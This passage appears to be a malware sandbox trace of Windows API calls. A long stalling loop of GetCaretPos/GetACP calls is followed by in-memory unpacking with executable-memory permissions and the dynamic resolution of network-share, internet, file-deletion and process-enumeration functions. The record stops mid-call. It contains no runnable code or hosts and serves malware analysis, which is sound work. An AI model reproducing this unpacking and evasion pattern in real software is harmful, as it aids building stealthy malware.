0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.046] GetACP () returned 0x4e4 [0039.046] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.047] GetACP () returned 0x4e4 [0039.047] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.048] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.048] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.049] GetACP () returned 0x4e4 [0039.049] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.050] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.050] GetACP () returned 0x4e4 [0039.051] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.051] GetACP () returned 0x4e4 [0039.051] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.051] GetACP () returned 0x4e4 [0039.051] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.051] GetACP () returned 0x4e4 [0039.051] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.051] GetACP () returned 0x4e4 [0039.051] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.051] GetACP () returned 0x4e4 [0039.051] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.051] GetACP () returned 0x4e4 [0039.051] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.052] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.052] GetACP () returned 0x4e4 [0039.322] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76e10000 [0039.322] VirtualProtect (in: lpAddress=0x320020, dwSize=0x90bd7, flNewProtect=0x40, lpflOldProtect=0x18f714 | out: lpflOldProtect=0x18f714*=0x4) returned 1 [0039.363] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.363] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0039.363] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0039.364] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0039.364] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0039.364] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0039.364] GetProcAddress (hModule=0x76e10000, lpProcName="Module32First") returned 0x76ea5cd9 [0039.364] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0039.364] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0039.367] Module32First (hSnapshot=0x58, lpme=0x18f4dc) returned 1 [0039.368] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x1ea0000 [0039.418] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0039.418] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.418] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0039.418] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0039.418] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0039.418] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0039.418] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0039.418] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0039.418] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0039.418] SetErrorMode (uMode=0x400) returned 0x0 [0039.419] SetErrorMode (uMode=0x0) returned 0x400 [0039.419] GetVersionExA (in: lpVersionInformation=0x18e40c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x6, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e40c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0039.419] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1fc0000 [0039.443] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f494 | out: lpflOldProtect=0x18f494*=0x2) returned 1 [0039.716] VirtualFree (lpAddress=0x1fc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.722] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x768e0000 [0039.722] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeW") returned 0x76901635 [0039.722] GetProcAddress (hModule=0x768e0000, lpProcName="UuidCreate") returned 0x768ff48b [0039.722] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringW") returned 0x76921ee5 [0039.722] GetProcAddress (hModule=0x768e0000, lpProcName="RpcStringFreeA") returned 0x76923fc5 [0039.722] GetProcAddress (hModule=0x768e0000, lpProcName="UuidToStringA") returned 0x7695d918 [0039.722] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74570000 [0039.932] GetProcAddress (hModule=0x74570000, lpProcName="WNetOpenEnumW") returned 0x74572f06 [0039.932] GetProcAddress (hModule=0x74570000, lpProcName="WNetEnumResourceW") returned 0x74573058 [0039.932] GetProcAddress (hModule=0x74570000, lpProcName="WNetCloseEnum") returned 0x74572dd6 [0039.932] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75190000 [0044.283] GetProcAddress (hModule=0x75190000, lpProcName="InternetCloseHandle") returned 0x751aab49 [0044.283] GetProcAddress (hModule=0x75190000, lpProcName="InternetReadFile") returned 0x751ab406 [0044.283] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlW") returned 0x7520be5c [0044.283] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenW") returned 0x751b9197 [0044.283] GetProcAddress (hModule=0x75190000, lpProcName="HttpQueryInfoW") returned 0x751b5c75 [0044.283] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenA") returned 0x751bf18e [0044.283] GetProcAddress (hModule=0x75190000, lpProcName="InternetOpenUrlA") returned 0x751d30f1 [0044.283] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74530000 [0044.570] GetProcAddress (hModule=0x74530000, lpProcName="timeGetTime") returned 0x745326e0 [0044.571] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0044.571] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendA") returned 0x753bd65e [0044.571] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindFileNameW") returned 0x753cbb71 [0044.571] GetProcAddress (hModule=0x753b0000, lpProcName="PathRemoveFileSpecW") returned 0x753c3248 [0044.571] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsA") returned 0x753ead1a [0044.571] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsW") returned 0x753c45bf [0044.571] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0044.571] GetProcAddress (hModule=0x753b0000, lpProcName="PathFindExtensionW") returned 0x753ca1b9 [0044.571] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0044.572] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0044.572] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0044.572] GetProcAddress (hModule=0x76e10000, lpProcName="GetDriveTypeA") returned 0x76e3ef75 [0044.572] GetProcAddress (hModule=0x76e10000, lpProcName="OpenProcess") returned 0x76e21986 [0044.572] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0044.572] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemDirectoryW") returned 0x76e25063 [0044.572] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0044.572] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryW") returned 0x76e2492b [0044.572] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0044.572] GetProcAddress (hModule=0x76e10000, lpProcName="CopyFileW") returned 0x76e4830d [0044.573] GetProcAddress (hModule=0x76e10000, lpProcName="FormatMessageW") returned 0x76e24620 [0044.573] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpynW") returned 0x76e4d556 [0044.573] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessA") returned 0x76e21072 [0044.573] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0044.573] GetProcAddress (hModule=0x76e10000, lpProcName="ReadFile") returned 0x76e23ed3 [0044.573] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0044.573] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatA") returned 0x76e42b7a [0044.573] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentVariableA") returned 0x76e233a0 [0044.573] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcmpW") returned 0x76e25929 [0044.573] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0044.574] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenW") returned 0x76e21700 [0044.574] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0044.574] GetProcAddress (hModule=0x76e10000, lpProcName="GetShortPathNameA") returned 0x76e4594d [0044.574] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSizeEx") returned 0x76e259e2 [0044.574] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0044.574] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0044.574] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0044.574] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0044.574] GetProcAddress (hModule=0x76e10000, lpProcName="MoveFileW") returned 0x76e39af0 [0044.574] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0044.574] GetProcAddress (hModule=0x76e10000, lpProcName="Process32FirstW") returned 0x76e48baf [0044.575] GetProcAddress (hModule=0x76e10000, lpProcName="LocalAlloc") returned 0x76e2168c [0044.575] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventW") returned 0x76e2183e [0044.575] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameA") returned 0x76e214b1 [0044.575] GetProcAddress (hModule=0x76e10000, lpProcName="Process32NextW") returned 0x76e4896c [0044.575] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatW") returned 0x76e4828e [0044.575] GetProcAddress (hModule=0x76e10000, lpProcName="CreateMutexA") returned 0x76e24c6b [0044.575] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0044.575] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0044.575] GetProcAddress (hModule=0x76e10000, lpProcName="SetEnvironmentVariableA") returned 0x76e2e331 [0044.575] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileW") returned 0x76e289b3 [0044.576] GetProcAddress (hModule=0x76e10000, lpProcName="LocalFree") returned 0x76e22d3c [0044.576] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyW") returned 0x76e43102 [0044.576] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileA") returned 0x76e25444 [0044.576] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyA") returned 0x76e42a9d [0044.576] GetProcAddress (hModule=0x76e10000, lpProcName="SetPriorityClass") returned 0x76e3cf28 [0044.576] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0044.576] GetProcAddress (hModule=0x76e10000, lpProcName="GetComputerNameW") returned 0x76e2dd0e [0044.576] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalDrives") returned 0x76e25371 [0044.576] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0044.576] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0044.576] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersion") returned 0x76e24467 [0044.577] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryA") returned 0x76e4d526 [0044.577] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThread") returned 0x76e234d5 [0044.577] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringW") returned 0x76e23bca [0044.577] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatW") returned 0x76e3f481 [0044.577] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatW") returned 0x76e434d7 [0044.577] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesW") returned 0x76ea425f [0044.577] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLCID") returned 0x76e23da5 [0044.577] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocale") returned 0x76e3ce46 [0044.577] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoW") returned 0x76e23c42 [0044.577] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreW") returned 0x76e3ca5a [0044.578] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0044.578] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount") returned 0x76e2110c [0044.578] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0044.578] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0044.578] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0044.578] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0044.578] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0044.578] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0044.578] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0044.578] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleA") returned 0x76e21245 [0044.579] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0044.579] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalMemoryStatus") returned 0x76e28b6d [0044.579] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0044.579] GetProcAddress (hModule=0x76e10000, 